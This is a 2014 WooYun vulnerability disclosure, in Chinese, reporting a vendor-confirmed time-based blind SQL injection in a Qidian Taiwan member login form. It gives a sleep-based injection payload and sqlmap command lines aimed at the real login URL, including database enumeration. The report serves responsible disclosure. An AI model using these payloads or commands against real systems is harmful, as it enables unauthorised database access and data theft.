当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077864

漏洞标题:起点中文网某分站一处盲注

相关厂商:盛大网络

漏洞作者: 大象

提交时间:2014-09-29 22:44

修复时间:2014-11-13 22:46

公开时间:2014-11-13 22:46

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-29: 细节已通知厂商并且等待厂商处理中
2014-09-29: 厂商已经确认,细节仅向厂商公开
2014-10-09: 细节向核心白帽子及相关领域专家公开
2014-10-19: 细节向普通白帽子公开
2014-10-29: 细节向实习白帽子公开
2014-11-13: 细节向公众公开

简要描述:

基于时间的盲注,利用起来比较困难,但是安全无小事~~

详细说明:

https://members.qidian.com.tw/apps/login.php
会员登录处提交的参数未过滤,post的内容

account=test&pwd=test1&comefrom_id=1&owner=COC&front_events_id=&front_events_name=&client_ip=123.123.123.31&url=http%3A%2F%2Fwww.qidian.com.tw&=%E7%99%BB%E5%85%A5&remember_me=1


响应时间0.5S
acount 处改为

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ =>


响应时间6.5S,可见此处是可以进行时间盲注的。
经测试account,client_ip,front_events_id,front_events_name,url,owner这几个参数都是可注入的.
放到sqlmap里试试,竟然一个注入点都没跑出来,可能网络不太好,时间盲注对网络要求较高,又试了几次跑出acount一个点.

sqlmap -u https://members.qidian.com.tw/apps/login.php  --data "account=test&pwd=test1&comefrom_id=1&owner=COC&front_events_id=&front_events_name=&client_ip=123.132.225.31&url=http%3A%2F%2Fwww.qidian.com.tw&=%E7%99%BB%E5%85%A5&remember_me=1" --technique T


1.jpg


想继续深入下发现连库都跑不出来。
修改了下 --time-sec参数,又跑出一个注入点。

sqlmap -u https://members.qidian.com.tw/apps/login.php  --data "account=test&pwd=test1&comefrom_id=1&owner=COC&front_events_id=&front_events_name=&client_ip=123.132.123.31&url=http%3A%2F%2Fwww.qidian.com.tw&=%E7%99%BB%E5%85%A5&remember_me=1" --technique T --time-sec 20


2.jpg


这次换个参数注入可以继续了

sqlmap -u https://members.qidian.com.tw/apps/login.php  --data "account=test&pwd=test1&comefrom_id=1&owner=COC&front_events_id=&front_events_name=&client_ip=123.132.225.31&url=http%3A%2F%2Fwww.qidian.com.tw&=%E7%99%BB%E5%85%A5&remember_me=1" --dbs --time-sec 20


QQ图片20140929214832.jpg

漏洞证明:

时间盲注费时间,整了半天,才跑把几个库跑出来。

end.jpg

修复方案:

此处好像完全没有过滤啊......

版权声明:转载请注明来源 大象@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-09-29 23:06

厂商回复:

谢谢报告,跑不出数据来就对了,你懂的!

最新状态:

暂无


漏洞评价:

评论

  1. 2014-09-29 23:29 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    @盛大网络 这话说的相当有底气啊....看来有什么机制在里面

  2. 2014-10-24 22:20 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)

    @子非海绵宝宝 25个漏洞197rank....我还有9个没确认呢、哼、一定超过你

  3. 2014-11-14 12:00 | 带我玩 ( 路人 | Rank:12 漏洞数:6 | 带我玩)

    @老和尚 你超不过了...

  4. 2015-05-13 17:29 | Tioyer ( 实习白帽子 | Rank:34 漏洞数:10 | 初来乍到,请各位大牛多多指教!)

    您能给我个您的联系方式吗?

  5. 2015-05-13 20:53 | 大象 ( 实习白帽子 | Rank:74 漏洞数:35 | ~~~^_^~~~)

    @Tioyer 有什么事么?可以邮件联系 shisithle#gamil.com